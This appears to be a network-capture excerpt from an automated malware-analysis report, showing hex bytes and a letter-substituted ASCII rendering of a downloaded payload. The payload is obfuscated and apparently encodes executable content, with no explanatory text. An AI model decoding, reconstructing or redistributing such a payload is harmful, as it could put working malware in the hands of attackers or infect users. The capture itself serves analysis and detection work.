                                                  2021-10-29 18:29:49 UTC287INData Raw: 4f 71 20 71 4f 58 20 71 71 70 20 70 4d 20 70 6d 20 70 71 20 57 57 20 45 6d 20 71 71 6d 20 4d 44 20 71 4a 45 20 4a 6d 4f 20 71 57 71 20 6d 4d 20 6d 6d 20 57 6d 20 4d 70 20 71 71 45 20 71 71 44 20 71 4a 4f 20 4d 58 20 70 71 20 6d 4d 20 70 4a 20 71 58 70 20 58 6d 20 71 4a 70 20 71 71 6d 20 71 4f 58 20 71 4f 71 20 70 4a 20 4a 4d 20 57 71 20 70 44 20 4a 71 4a 20 71 58 44 20 71 4a 44 20 71 4f 44 20 71 71 6d 20 70 4a 20 71 4f 4f 20 70 4d 20 70 44 20 71 4a 71 20 71 71 57 20 71 4f 70 20 4a 70 44 20 71 71 4a 20 57 57 20 57 58 20 57 71 20 70 44 20 4a 71 70 20 71 71 6d 20 71 71 4a 20 71 4f 44 20 71 71 70 20 70 4a 20 71 45 45 20 71 4a 44 20 71 4d 20 58 70 20 71 4a 4a 20 4d 44 20 71 4a 45 20 4d 70 20 57 71 20 70 6d 20 71 45 4d 20 57 6d 20 44 57 20 4d 44 20 44 6d 20 71
                                                  Data Ascii: Oq qOX qqp pM pm pq WW Em qqm MD qJE JmO qWq mM mm Wm Mp qqE qqD qJO MX pq mM pJ qXp Xm qJp qqm qOX qOq pJ JM Wq pD JqJ qXD qJD qOD qqm pJ qOO pM pD qJq qqW qOp JpD qqJ WW WX Wq pD Jqp qqm qqJ qOD qqp pJ qEE qJD qM Xp qJJ MD qJE Mp Wq pm qEM Wm DW MD Dm q
                                                  2021-10-29 18:29:49 UTC303INData Raw: 58 20 71 45 58 20 71 6d 4d 20 57 71 20 70 44 20 4a 71 4a 20 4a 71 58 20 71 4a 6d 20 44 4d 20 71 71 4a 20 70 4d 20 70 6d 20 70 20 57 57 20 45 4f 20 4a 6d 4a 20 71 44 71 20 71 4f 4f 20 58 58 20 57 4f 20 70 45 20 70 4a 20 45 20 58 57 20 4d 44 20 4a 6d 57 20 71 44 4d 20 71 4a 71 20 4a 44 20 6d 58 20 70 4d 20 70 44 20 71 4f 71 20 71 71 57 20 71 4f 70 20 4a 70 45 20 71 44 4f 20 57 4d 20 4a 6d 20 57 4f 20 70 57 20 45 4f 20 44 45 20 71 71 44 20 71 4a 45 20 4a 6d 4f 20 4a 57 6d 20 57 71 20 4a 44 20 57 6d 20 4d 6d 20 71 4a 70 20 4d 70 20 71 4f 4d 20 71 4f 71 20 70 4a 20 4a 4d 20 57 71 20 70 44 20 4a 71 4a 20 71 4d 6d 20 71 4a 6d 20 44 4d 20 71 71 4a 20 70 4d 20 70 6d 20 70 71 20 57 57 20 45 4f 20 4a 6d 4a 20 71 6d 71 20 71 4f 4f 20 58 58 20 57 4f 20 70 45 20 70 4a
                                                  Data Ascii: X qEX qmM Wq pD JqJ JqX qJm DM qqJ pM pm p WW EO JmJ qDq qOO XX WO pE pJ E XW MD JmW qDM qJq JD mX pM pD qOq qqW qOp JpE qDO WM Jm WO pW EO DE qqD qJE JmO JWm Wq JD Wm Mm qJp Mp qOM qOq pJ JM Wq pD JqJ qMm qJm DM qqJ pM pm pq WW EO JmJ qmq qOO XX WO pE pJ
                                                  2021-10-29 18:29:49 UTC319INData Raw: 4d 20 57 6d 20 57 4f 20 45 6d 20 57 4f 20 71 4f 58 20 58 6d 20 70 57 20 71 71 45 20 4a 4d 20 71 71 4a 20 4d 57 20 6d 58 20 58 70 20 57 6d 20 71 4d 20 71 71 6d 20 44 70 20 71 4f 4d 20 44 20 57 4f 20 58 71 20 57 4f 20 71 71 70 20 58 6d 20 70 4f 20 71 71 45 20 4a 57 20 71 71 4a 20 71 4f 45 20 6d 58 20 71 4f 71 20 57 6d 20 4a 20 71 71 6d 20 44 20 71 4f 4d 20 6d 71 20 57 4f 20 4d 70 20 57 4f 20 71 57 20 58 6d 20 4a 4d 20 71 71 45 20 71 6d 20 71 71 4a 20 71 71 45 20 6d 58 20 44 44 20 57 6d 20 44 71 20 71 71 6d 20 6d 6d 20 71 4f 4d 20 4a 4d 20 57 4f 20 45 4a 20 57 4f 20 4d 70 20 58 6d 20 6d 70 20 71 71 45 20 4d 57 20 71 71 4a 20 45 20 6d 58 20 4d 4a 20 57 6d 20 71 70 20 71 71 6d 20 45 71 20 71 4f 4d 20 44 4d 20 57 4f 20 58 58 20 57 4f 20 58 57 20 58 6d 20 57 70
                                                  Data Ascii: M Wm WO Em WO qOX Xm pW qqE JM qqJ MW mX Xp Wm qM qqm Dp qOM D WO Xq WO qqp Xm pO qqE JW qqJ qOE mX qOq Wm J qqm D qOM mq WO Mp WO qW Xm JM qqE qm qqJ qqE mX DD Wm Dq qqm mm qOM JM WO EJ WO Mp Xm mp qqE MW qqJ E mX MJ Wm qp qqm Eq qOM DM WO XX WO XW Xm Wp
                                                  2021-10-29 18:29:49 UTC335INData Raw: 20 71 71 4a 20 57 4f 20 6d 58 20 57 4f 20 57 6d 20 58 6d 20 71 71 6d 20 71 71 45 20 71 4f 4d 20 71 71 4a 20 57 4f 20 6d 58 20 57 4f 20 57 6d 20 58 6d 20 71 71 6d 20 71 71 45 20 71 4f 4d 20 71 71 4a 20 57 4f 20 6d 58 20 57 4f 20 57 6d 20 58 6d 20 71 71 6d 20 71 71 45 20 71 4f 4d 20 71 71 4a 20 57 4f 20 6d 58 20 57 4f 20 57 6d 20 58 6d 20 71 71 6d 20 71 71 45 20 71 4f 4d 20 71 71 4a 20 57 4f 20 6d 58 20 57 4f 20 57 6d 20 58 6d 20 71 71 6d 20 71 71 45 20 71 4f 4d 20 71 71 4a 20 57 4f 20 6d 58 20 57 4f 20 57 6d 20 58 6d 20 71 71 6d 20 71 71 45 20 71 4f 4d 20 71 71 4a 20 57 4f 20 6d 58 20 57 4f 20 57 6d 20 58 6d 20 71 71 6d 20 71 71 45 20 71 4f 4d 20 71 71 4a 20 57 4f 20 6d 58 20 57 4f 20 57 6d 20 58 6d 20 71 71 6d 20 71 71 45 20 71 4f 4d 20 71 71 4a 20 57 4f
                                                  Data Ascii: qqJ WO mX WO Wm Xm qqm qqE qOM qqJ WO mX WO Wm Xm qqm qqE qOM qqJ WO mX WO Wm Xm qqm qqE qOM qqJ WO mX WO Wm Xm qqm qqE qOM qqJ WO mX WO Wm Xm qqm qqE qOM qqJ WO mX WO Wm Xm qqm qqE qOM qqJ WO mX WO Wm Xm qqm qqE qOM qqJ WO mX WO Wm Xm qqm qqE qOM qqJ WO
                                                  2021-10-29 18:29:49 UTC351INData Raw: 71 6d 20 4a 20 4f 20 6d 4f 20 45 20 4f 20 4f 20 44 20 4f 20 4f 20 4f 20 4f 20 4f 20 70 4a 20 45 4f 20 4f 20 4f 20 4f 20 4a 57 6d 20 71 6d 20 4a 20 4f 20 4a 57 6d 20 71 4a 20 70 20 4f 20 4a 57 6d 20 71 6d 20 4a 57 20 4f 20 4a 57 6d 20 71 4a 20 4a 57 20 4f 20 57 45 20 71 44 58 20 4f 20 4f 20 4f 20 70 4a 20 45 71 20 4f 20 4f 20 4f 20 4a 57 6d 20 71 6d 20 4a 20 4f 20 70 4a 20 4f 20 4f 20 4f 20 4f 20 4a 57 6d 20 71 6d 20 4a 44 20 4f 20 70 4a 20 45 4a 20 4f 20 4f 20 4f 20 4a 57 6d 20 71 6d 20 4a 20 4f 20 70 4a 20 71 20 4f 20 4f 20 4f 20 4a 57 6d 20 71 6d 20 4a 45 20 4f 20 70 4a 20 45 70 20 4f 20 4f 20 4f 20 4a 57 6d 20 71 6d 20 4a 20 4f 20 4a 57 6d 20 71 4a 20 58 20 4f 20 4a 57 6d 20 71 4a 20 4d 20 4f 20 6d 4f 20 71 4a 20 4f 20 4f 20 44 20 4a 57 6d 20 71 6d 20
                                                  Data Ascii: qm J O mO E O O D O O O O O pJ EO O O O JWm qm J O JWm qJ p O JWm qm JW O JWm qJ JW O WE qDX O O O pJ Eq O O O JWm qm J O pJ O O O O JWm qm JD O pJ EJ O O O JWm qm J O pJ q O O O JWm qm JE O pJ Ep O O O JWm qm J O JWm qJ X O JWm qJ M O mO qJ O O D JWm qm
                                                  2021-10-29 18:29:49 UTC367INData Raw: 4f 20 4f 20 4f 20 4f 20 4f 20 4f 20 71 4f 44 20 4a 57 6d 20 4a 57 57 20 4a 57 57 20 4a 4a 71 20 6d 4d 20 4f 20 4f 20 4f 20 71 71 45 20 70 4a 20 4f 20 4f 20 71 20 4a 4f 20 4a 57 6d 20 70 20 4a 57 6d 20 71 4a 20 71 20 4f 20 70 4a 20 4f 20 4f 20 4f 20 4f 20 4a 57 6d 20 70 20 4d 57 20 4a 57 6d 20 71 4a 20 4a 20 4f 20 70 4a 20 4f 20 4f 20 4f 20 4f 20 4a 57 6d 20 71 20 4d 57 20 4a 57 6d 20 71 45 20 71 71 44 20 70 4a 20 4f 20 4f 20 71 20 6d 4f 20 4d 20 4f 20 4f 20 71 4f 20 4a 4a 71 20 71 57 70 20 4a 57 57 20 4a 57 57 20 4a 57 57 20 70 4a 20 57 71 20 4f 20 71 4f 20 71 4a 58 20 6d 4f 20 71 4f 20 4f 20 4f 20 71 4f 20 71 4a 4a 20 4a 57 6d 20 71 4a 20 4a 20 4f 20 57 45 20 44 20 4f 20 4f 20 4f 20 6d 4f 20 45 20 4f 20 4f 20 71 4f 20 4f 20 4a 57 6d 20 71 4a 20 4f 20 4f
                                                  Data Ascii: O O O O O O qOD JWm JWW JWW JJq mM O O O qqE pJ O O q JO JWm p JWm qJ q O pJ O O O O JWm p MW JWm qJ J O pJ O O O O JWm q MW JWm qE qqD pJ O O q mO M O O qO JJq qWp JWW JWW JWW pJ Wq O qO qJX mO qO O O qO qJJ JWm qJ J O WE D O O O mO E O O qO O JWm qJ O O
                                                  2021-10-29 18:29:49 UTC383INData Raw: 4f 20 4f 20 4f 20 4f 20 70 71 20 57 44 20 71 57 45 20 70 45 20 70 4a 20 4f 20 4f 20 4f 20 4f 20 70 71 20 57 70 20 71 57 45 20 70 45 20 4a 4a 20 70 71 20 4d 45 20 71 57 45 20 71 71 57 20 71 58 45 20 4f 20 4f 20 71 4f 20 6d 4a 20 71 4d 20 6d 58 20 6d 20 4f 20 71 57 4f 20 4f 20 4f 20 4f 20 70 20 4f 20 4f 20 71 45 20 4a 58 20 71 6d 71 20 71 70 44 20 4f 20 4f 20 71 20 70 45 20 70 4a 20 57 20 4f 20 4f 20 4f 20 70 71 20 71 4f 71 20 71 57 45 20 70 45 20 70 4a 20 57 20 4f 20 4f 20 4f 20 70 71 20 4d 45 20 71 57 45 20 70 45 20 4a 45 20 70 71 20 71 4f 4a 20 71 57 45 20 70 45 20 70 4a 20 6d 20 4f 20 4f 20 4f 20 70 71 20 57 45 20 71 57 45 20 70 45 20 70 4a 20 6d 20 4f 20 4f 20 4f 20 70 71 20 57 6d 20 71 57 45 20 70 45 20 4a 44 20 70 71 20 71 4f 58 20 71 57 45 20 70 45
                                                  Data Ascii: O O O O pq WD qWE pE pJ O O O O pq Wp qWE pE JJ pq ME qWE qqW qXE O O qO mJ qM mX m O qWO O O O p O O qE JX qmq qpD O O q pE pJ W O O O pq qOq qWE pE pJ W O O O pq ME qWE pE JE pq qOJ qWE pE pJ m O O O pq WE qWE pE pJ m O O O pq Wm qWE pE JD pq qOX qWE pE
                                                  2021-10-29 18:29:49 UTC399INData Raw: 4f 20 4f 20 4f 20 4f 20 70 71 20 71 4f 71 20 71 57 45 20 70 45 20 70 4a 20 70 4f 20 4f 20 4f 20 4f 20 70 71 20 6d 4d 20 71 57 45 20 70 45 20 70 71 20 70 4f 20 70 71 20 6d 44 20 71 57 45 20 70 45 20 70 4a 20 4a 4d 20 4f 20 4f 20 4f 20 70 71 20 6d 58 20 71 57 45 20 70 45 20 70 4a 20 4a 4d 20 4f 20 4f 20 4f 20 70 71 20 57 44 20 71 57 45 20 70 45 20 70 71 20 4a 4d 20 70 71 20 71 71 57 20 71 57 45 20 70 45 20 70 4a 20 4a 58 20 4f 20 4f 20 4f 20 70 71 20 57 4f 20 71 57 45 20 70 45 20 70 4a 20 4a 58 20 4f 20 4f 20 4f 20 70 71 20 71 4f 71 20 71 57 45 20 70 45 20 70 71 20 4a 58 20 70 71 20 71 71 44 20 71 57 45 20 70 45 20 70 4a 20 4a 45 20 4f 20 4f 20 4f 20 70 71 20 4d 58 20 71 57 45 20 70 45 20 70 4a 20 4a 45 20 4f 20 4f 20 4f 20 70 71 20 57 6d 20 71 57 45 20 70
                                                  Data Ascii: O O O O pq qOq qWE pE pJ pO O O O pq mM qWE pE pq pO pq mD qWE pE pJ JM O O O pq mX qWE pE pJ JM O O O pq WD qWE pE pq JM pq qqW qWE pE pJ JX O O O pq WO qWE pE pJ JX O O O pq qOq qWE pE pq JX pq qqD qWE pE pJ JE O O O pq MX qWE pE pJ JE O O O pq Wm qWE p
                                                  2021-10-29 18:29:49 UTC415INData Raw: 4a 4f 20 4f 20 4f 20 4f 20 70 20 4f 20 4f 20 71 45 20 70 71 20 4d 20 71 6d 71 20 71 70 44 20 4f 20 4f 20 71 20 70 45 20 70 4a 20 58 20 4f 20 4f 20 4f 20 70 71 20 71 4f 4f 20 71 57 45 20 70 45 20 70 4a 20 58 20 4f 20 4f 20 4f 20 70 71 20 57 4f 20 71 57 45 20 70 45 20 70 4f 20 70 71 20 71 4f 58 20 71 57 45 20 70 45 20 70 4a 20 45 20 4f 20 4f 20 4f 20 70 71 20 57 6d 20 71 57 45 20 70 45 20 70 4a 20 45 20 4f 20 4f 20 4f 20 70 71 20 57 4a 20 71 57 45 20 70 45 20 4a 4d 20 70 71 20 71 4f 58 20 71 57 45 20 70 45 20 70 4a 20 44 20 4f 20 4f 20 4f 20 70 71 20 71 4f 71 20 71 57 45 20 70 45 20 70 4a 20 44 20 4f 20 4f 20 4f 20 70 71 20 71 4f 4f 20 71 57 45 20 70 45 20 4a 58 20 70 71 20 71 4f 4f 20 71 57 45 20 70 45 20 70 4a 20 57 20 4f 20 4f 20 4f 20 70 71 20 57 6d 20
                                                  Data Ascii: JO O O O p O O qE pq M qmq qpD O O q pE pJ X O O O pq qOO qWE pE pJ X O O O pq WO qWE pE pO pq qOX qWE pE pJ E O O O pq Wm qWE pE pJ E O O O pq WJ qWE pE JM pq qOX qWE pE pJ D O O O pq qOq qWE pE pJ D O O O pq qOO qWE pE JX pq qOO qWE pE pJ W O O O pq Wm
                                                  2021-10-29 18:29:49 UTC431INData Raw: 4f 20 4f 20 4f 20 70 71 20 4d 45 20 71 57 45 20 70 45 20 70 71 20 57 4a 20 70 71 20 44 57 20 71 57 45 20 70 45 20 70 4a 20 57 71 20 4f 20 4f 20 4f 20 70 71 20 57 44 20 71 57 45 20 70 45 20 70 4a 20 57 71 20 4f 20 4f 20 4f 20 70 71 20 57 4a 20 71 57 45 20 70 45 20 70 4a 20 57 71 20 4f 20 4f 20 4f 20 70 71 20 4d 58 20 71 57 45 20 70 45 20 70 4a 20 57 71 20 4f 20 4f 20 4f 20 70 71 20 57 4a 20 71 57 45 20 70 45 20 70 71 20 57 71 20 70 71 20 70 4a 20 71 57 45 20 70 45 20 70 4a 20 57 4f 20 4f 20 4f 20 4f 20 70 71 20 71 4f 4a 20 71 57 45 20 70 45 20 70 4a 20 57 4f 20 4f 20 4f 20 4f 20 70 71 20 57 45 20 71 57 45 20 70 45 20 70 4a 20 57 4f 20 4f 20 4f 20 4f 20 70 71 20 57 4f 20 71 57 45 20 70 45 20 70 4a 20 57 4f 20 4f 20 4f 20 4f 20 70 71 20 71 4f 4f 20 71 57 45
                                                  Data Ascii: O O O pq ME qWE pE pq WJ pq DW qWE pE pJ Wq O O O pq WD qWE pE pJ Wq O O O pq WJ qWE pE pJ Wq O O O pq MX qWE pE pJ Wq O O O pq WJ qWE pE pq Wq pq pJ qWE pE pJ WO O O O pq qOJ qWE pE pJ WO O O O pq WE qWE pE pJ WO O O O pq WO qWE pE pJ WO O O O pq qOO qWE
                                                  2021-10-29 18:29:49 UTC439INData Raw: 70 71 20 4d 4d 20 71 57 45 20 70 45 20 70 71 20 71 44 20 70 71 20 44 4d 20 71 57 45 20 70 45 20 70 4a 20 71 57 20 4f 20 4f 20 4f 20 70 71 20 4d 45 20 71 57 45 20 70 45 20 70 4a 20 71 57 20 4f 20 4f 20 4f 20 70 71 20 71 4f 4f 20 71 57 45 20 70 45 20 70 4a 20 71 57 20 4f 20 4f 20 4f 20 70 71 20 57 4a 20 71 57 45 20 70 45 20 70 4a 20 71 57 20 4f 20 4f 20 4f 20 70 71 20 57 4a 20 71 57 45 20 70 45 20 70 71 20 71 57 20 70 71 20 45 44 20 71 57 45 20 70 45 20 70 4a 20 71 6d 20 4f 20 4f 20 4f 20 70 71 20 4d 4d 20 71 57 45 20 70 45 20 70 4a 20 71 6d 20 4f 20 4f 20 4f 20 70 71 20 4d 4d 20 71 57 45 20 70 45 20 70 4a 20 71 6d 20 4f 20 4f 20 4f 20 70 71 20 57 45 20 71 57 45 20 70 45 20 70 4a 20 71 6d 20 4f 20 4f 20 4f 20 70 71 20 71 4f 4f 20 71 57 45 20 70 45 20 70 71
                                                  Data Ascii: pq MM qWE pE pq qD pq DM qWE pE pJ qW O O O pq ME qWE pE pJ qW O O O pq qOO qWE pE pJ qW O O O pq WJ qWE pE pJ qW O O O pq WJ qWE pE pq qW pq ED qWE pE pJ qm O O O pq MM qWE pE pJ qm O O O pq MM qWE pE pJ qm O O O pq WE qWE pE pJ qm O O O pq qOO qWE pE pq
                                                  2021-10-29 18:29:49 UTC455INData Raw: 20 71 57 45 20 70 45 20 70 71 20 4a 4f 20 70 71 20 71 4f 71 20 71 57 45 20 70 45 20 70 4a 20 71 4d 20 4f 20 4f 20 4f 20 70 71 20 6d 4d 20 71 57 45 20 70 45 20 70 4a 20 71 4d 20 4f 20 4f 20 4f 20 70 71 20 6d 58 20 71 57 45 20 70 45 20 70 4a 20 71 4d 20 4f 20 4f 20 4f 20 70 71 20 57 6d 20 71 57 45 20 70 45 20 70 4a 20 71 4d 20 4f 20 4f 20 4f 20 70 71 20 57 57 20 71 57 45 20 70 45 20 70 71 20 71 4d 20 70 71 20 71 4f 4d 20 71 57 45 20 70 45 20 70 4a 20 71 58 20 4f 20 4f 20 4f 20 70 71 20 57 6d 20 71 57 45 20 70 45 20 70 4a 20 71 58 20 4f 20 4f 20 4f 20 70 71 20 4d 4d 20 71 57 45 20 70 45 20 70 4a 20 71 58 20 4f 20 4f 20 4f 20 70 71 20 4d 45 20 71 57 45 20 70 45 20 70 4a 20 71 58 20 4f 20 4f 20 4f 20 70 71 20 57 4f 20 71 57 45 20 70 45 20 70 71 20 71 58 20 70
                                                  Data Ascii: qWE pE pq JO pq qOq qWE pE pJ qM O O O pq mM qWE pE pJ qM O O O pq mX qWE pE pJ qM O O O pq Wm qWE pE pJ qM O O O pq WW qWE pE pq qM pq qOM qWE pE pJ qX O O O pq Wm qWE pE pJ qX O O O pq MM qWE pE pJ qX O O O pq ME qWE pE pJ qX O O O pq WO qWE pE pq qX p
                                                  2021-10-29 18:29:49 UTC471INData Raw: 20 70 45 20 70 4a 20 4f 20 4f 20 4f 20 4f 20 70 71 20 57 71 20 71 57 45 20 70 45 20 4a 4a 20 70 71 20 45 70 20 71 57 45 20 71 71 57 20 71 58 45 20 4f 20 4f 20 71 4f 20 6d 4a 20 71 4d 20 6d 58 20 6d 20 4f 20 4a 57 4a 20 71 20 4f 20 4f 20 70 20 4f 20 4f 20 71 45 20 70 71 20 71 4a 20 71 6d 71 20 71 70 44 20 4f 20 4f 20 71 20 70 45 20 70 4a 20 71 71 20 4f 20 4f 20 4f 20 70 71 20 6d 4d 20 71 57 45 20 70 45 20 70 4a 20 71 71 20 4f 20 4f 20 4f 20 70 71 20 71 4f 71 20 71 57 45 20 70 45 20 70 4a 20 71 71 20 4f 20 4f 20 4f 20 70 71 20 6d 58 20 71 57 45 20 70 45 20 70 4a 20 71 71 20 4f 20 4f 20 4f 20 70 71 20 57 6d 20 71 57 45 20 70 45 20 70 71 20 71 71 20 70 71 20 71 4f 58 20 71 57 45 20 70 45 20 70 4a 20 71 4f 20 4f 20 4f 20 4f 20 70 71 20 57 4a 20 71 57 45 20 70
                                                  Data Ascii: pE pJ O O O O pq Wq qWE pE JJ pq Ep qWE qqW qXE O O qO mJ qM mX m O JWJ q O O p O O qE pq qJ qmq qpD O O q pE pJ qq O O O pq mM qWE pE pJ qq O O O pq qOq qWE pE pJ qq O O O pq mX qWE pE pJ qq O O O pq Wm qWE pE pq qq pq qOX qWE pE pJ qO O O O pq WJ qWE p
                                                  2021-10-29 18:29:49 UTC487INData Raw: 4a 58 20 57 58 20 70 70 20 71 57 57 20 71 20 58 44 20 71 4a 58 20 4a 4f 4d 20 71 4d 20 71 57 57 20 71 20 58 44 20 71 4a 58 20 4a 4a 58 20 70 71 20 71 57 57 20 71 20 58 44 20 71 4a 58 20 71 4a 71 20 71 4d 20 71 57 57 20 71 20 58 44 20 71 4a 58 20 71 4d 4d 20 71 57 20 71 57 57 20 71 20 58 44 20 71 4a 58 20 4a 57 70 20 4a 57 20 71 57 57 20 71 20 58 44 20 71 4a 58 20 71 58 6d 20 45 20 71 57 57 20 71 20 58 44 20 71 4a 58 20 4a 71 71 20 70 70 20 71 57 57 20 71 20 58 44 20 71 4a 58 20 57 6d 20 70 44 20 71 57 57 20 71 20 58 44 20 71 4a 58 20 71 70 58 20 70 4d 20 71 57 57 20 71 20 58 44 20 71 4a 58 20 4a 4d 20 71 44 20 71 57 57 20 71 20 58 44 20 71 4a 58 20 4a 4f 6d 20 6d 4f 20 71 57 57 20 71 20 58 44 20 71 4a 58 20 71 4f 20 70 20 71 57 57 20 71 20 58 44 20 71 4a
                                                  Data Ascii: JX WX pp qWW q XD qJX JOM qM qWW q XD qJX JJX pq qWW q XD qJX qJq qM qWW q XD qJX qMM qW qWW q XD qJX JWp JW qWW q XD qJX qXm E qWW q XD qJX Jqq pp qWW q XD qJX Wm pD qWW q XD qJX qpX pM qWW q XD qJX JM qD qWW q XD qJX JOm mO qWW q XD qJX qO p qWW q XD qJ
                                                  2021-10-29 18:29:49 UTC503INData Raw: 20 70 20 58 57 20 57 20 4d 20 4f 20 4a 4a 4f 20 70 20 4d 4f 20 57 20 4d 20 4f 20 4a 4a 6d 20 70 20 4d 57 20 57 20 4d 20 4f 20 4a 4a 58 20 70 20 71 4f 4f 20 57 20 4d 20 4f 20 4a 70 4a 20 70 20 71 4f 57 20 57 20 4d 20 4f 20 4a 70 44 20 70 20 71 71 4f 20 57 20 4d 20 4f 20 4a 6d 4f 20 70 20 71 71 57 20 57 20 4d 20 4f 20 4a 6d 6d 20 70 20 71 4a 4f 20 57 20 4d 20 4f 20 4a 6d 58 20 70 20 71 4a 57 20 57 20 4d 20 4f 20 4a 57 4a 20 70 20 71 70 4f 20 57 20 4d 20 4f 20 4f 20 6d 20 71 70 57 20 57 20 4d 20 4f 20 6d 20 6d 20 71 6d 4f 20 57 20 4d 20 4f 20 58 20 6d 20 71 6d 57 20 57 20 4d 20 4f 20 71 4a 20 6d 20 71 57 4f 20 57 20 4d 20 4f 20 71 44 20 6d 20 71 57 57 20 57 20 4d 20 4f 20 4a 4f 20 6d 20 71 44 4f 20 57 20 4d 20 4f 20 4a 6d 20 6d 20 71 44 57 20 57 20 4d 20 4f
                                                  Data Ascii: p XW W M O JJO p MO W M O JJm p MW W M O JJX p qOO W M O JpJ p qOW W M O JpD p qqO W M O JmO p qqW W M O Jmm p qJO W M O JmX p qJW W M O JWJ p qpO W M O O m qpW W M O m m qmO W M O X m qmW W M O qJ m qWO W M O qD m qWW W M O JO m qDO W M O Jm m qDW W M O
                                                  2021-10-29 18:29:49 UTC519INData Raw: 71 20 4f 20 4d 45 20 71 71 58 20 71 4f 71 20 71 71 4f 20 71 71 45 20 71 4f 71 20 4f 20 58 4a 20 71 4f 71 20 71 71 4a 20 4d 45 20 71 71 58 20 71 4f 71 20 4f 20 71 4f 4f 20 71 4f 57 20 71 71 57 20 4d 45 20 71 4f 70 20 71 4f 70 20 71 71 6d 20 71 4f 71 20 71 4f 70 20 4d 45 20 71 71 44 20 71 4f 57 20 71 71 58 20 71 4f 71 20 4f 20 71 4f 70 20 71 4f 71 20 71 71 44 20 4d 57 20 45 70 20 71 71 57 20 58 4f 20 71 71 6d 20 71 4f 57 20 71 4f 4d 20 71 4f 57 20 71 71 44 20 71 4f 57 20 71 71 58 20 71 4f 71 20 4f 20 4d 57 20 4d 57 20 4d 57 20 45 58 20 71 71 71 20 71 71 4f 20 4d 45 20 71 71 57 20 71 71 57 20 71 4f 71 20 71 71 6d 20 71 71 44 20 71 4f 57 20 71 71 58 20 71 4f 71 20 4f 20 71 4f 6d 20 71 4f 71 20 4d 45 20 71 71 58 20 71 4f 57 20 71 4f 71 20 71 71 6d 20 6d 44 20
                                                  Data Ascii: q O ME qqX qOq qqO qqE qOq O XJ qOq qqJ ME qqX qOq O qOO qOW qqW ME qOp qOp qqm qOq qOp ME qqD qOW qqX qOq O qOp qOq qqD MW Ep qqW XO qqm qOW qOM qOW qqD qOW qqX qOq O MW MW MW EX qqq qqO ME qqW qqW qOq qqm qqD qOW qqX qOq O qOm qOq ME qqX qOW qOq qqm mD
                                                  2021-10-29 18:29:49 UTC535INData Raw: 4f 20 4d 58 20 71 71 45 20 71 71 57 20 71 4f 6d 20 71 4f 71 20 71 71 57 20 4f 20 71 4f 57 20 71 71 4f 20 4d 45 20 4d 4d 20 4d 4d 20 71 71 45 20 71 71 6d 20 4d 45 20 4d 4d 20 71 4f 57 20 71 4f 71 20 71 71 57 20 4f 20 71 4f 4a 20 71 71 71 20 71 71 6d 20 71 4f 71 20 4d 4d 20 4d 45 20 71 4f 4f 20 71 4f 4f 20 71 4f 57 20 71 4f 71 20 71 71 57 20 4f 20 45 70 20 71 4f 4f 20 71 4f 71 20 71 71 4f 20 71 71 44 20 71 4f 57 20 71 4f 4a 20 71 4f 57 20 71 4f 71 20 71 71 57 20 4f 20 58 4f 20 71 4f 71 20 71 71 4f 20 71 71 44 20 4d 45 20 71 71 6d 20 4d 4d 20 71 4f 6d 20 71 4f 57 20 71 4f 71 20 71 71 57 20 4f 20 71 4f 4f 20 71 4a 71 20 71 71 57 20 71 71 44 20 71 71 6d 20 71 71 71 20 71 71 4a 20 71 4f 6d 20 71 4f 57 20 71 4f 71 20 71 71 57 20 4f 20 71 71 57 20 71 4a 71 20 71
                                                  Data Ascii: O MX qqE qqW qOm qOq qqW O qOW qqO ME MM MM qqE qqm ME MM qOW qOq qqW O qOJ qqq qqm qOq MM ME qOO qOO qOW qOq qqW O Ep qOO qOq qqO qqD qOW qOJ qOW qOq qqW O XO qOq qqO qqD ME qqm MM qOm qOW qOq qqW O qOO qJq qqW qqD qqm qqq qqJ qOm qOW qOq qqW O qqW qJq q
                                                  2021-10-29 18:29:49 UTC551INData Raw: 4d 4d 20 4f 20 71 4a 71 20 4f 20 44 44 20 4f 20 71 71 4d 20 4f 20 4d 4d 20 4f 20 71 4f 4d 20 4f 20 57 45 20 4f 20 71 71 4f 20 4f 20 4d 4d 20 4f 20 71 4f 4d 20 4f 20 45 4f 20 4f 20 71 71 44 20 4f 20 45 70 20 4f 20 45 71 20 4f 20 45 58 20 4f 20 71 4f 6d 20 4f 20 4d 58 20 4f 20 71 4f 4d 20 4f 20 57 70 20 4f 20 71 71 58 20 4f 20 71 4f 4f 20 4f 20 44 45 20 4f 20 44 44 20 4f 20 71 4f 57 20 4f 20 4d 4f 20 4f 20 58 70 20 4f 20 44 44 20 4f 20 71 4a 71 20 4f 20 71 4f 4f 20 4f 20 58 45 20 4f 20 57 4a 20 4f 20 71 4f 70 20 4f 20 4d 45 20 4f 20 58 45 20 4f 20 57 4a 20 4f 20 71 4f 70 20 4f 20 58 4a 20 4f 20 44 4d 20 4f 20 57 45 20 4f 20 58 6d 20 4f 20 45 70 20 4f 20 45 71 20 4f 20 6d 4d 20 4f 20 71 71 58 20 4f 20 4d 4f 20 4f 20 45 71 20 4f 20 58 57 20 4f 20 71 71 45 20
                                                  Data Ascii: MM O qJq O DD O qqM O MM O qOM O WE O qqO O MM O qOM O EO O qqD O Ep O Eq O EX O qOm O MX O qOM O Wp O qqX O qOO O DE O DD O qOW O MO O Xp O DD O qJq O qOO O XE O WJ O qOp O ME O XE O WJ O qOp O XJ O DM O WE O Xm O Ep O Eq O mM O qqX O MO O Eq O XW O qqE
                                                  2021-10-29 18:29:49 UTC567INData Raw: 4f 20 45 4d 20 4f 20 57 44 20 4f 20 71 4a 71 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 45 20 4f 20 45 4f 20 4f 20 71 71 4d 20 4f 20 45 4f 20 4f 20 71 4f 58 20 4f 20 4d 4f 20 4f 20 71 4f 4a 20 4f 20 71 4f 4d 20 4f 20 71 71 4f 20 4f 20 6d 45 20 4f 20 71 4f 4f 20 4f 20 71 4f 71 20 4f 20 71 4a 71 20 4f 20 45 58 20 4f 20 71 4f 4a 20 4f 20 71 4f 4f 20 4f 20 71 4f 44 20 4f 20 71 71 71 20 4f 20 58 70 20 4f 20 71 4f 45 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 45 70 20 4f 20 71 71 44 20 4f 20 45 4f 20 4f 20 57 6d 20 4f 20 45 70 20 4f 20 58 58 20 4f 20 44 57 20 4f 20 71 4a 4f 20 4f 20 6d 58 20 4f 20 58 58 20 4f 20 71 71 4d 20 4f 20 57 6d 20 4f 20 45 45 20 4f 20 58 4a 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 45 4a 20 4f 20 58 71 20 4f 20 44 58 20 4f 20 71
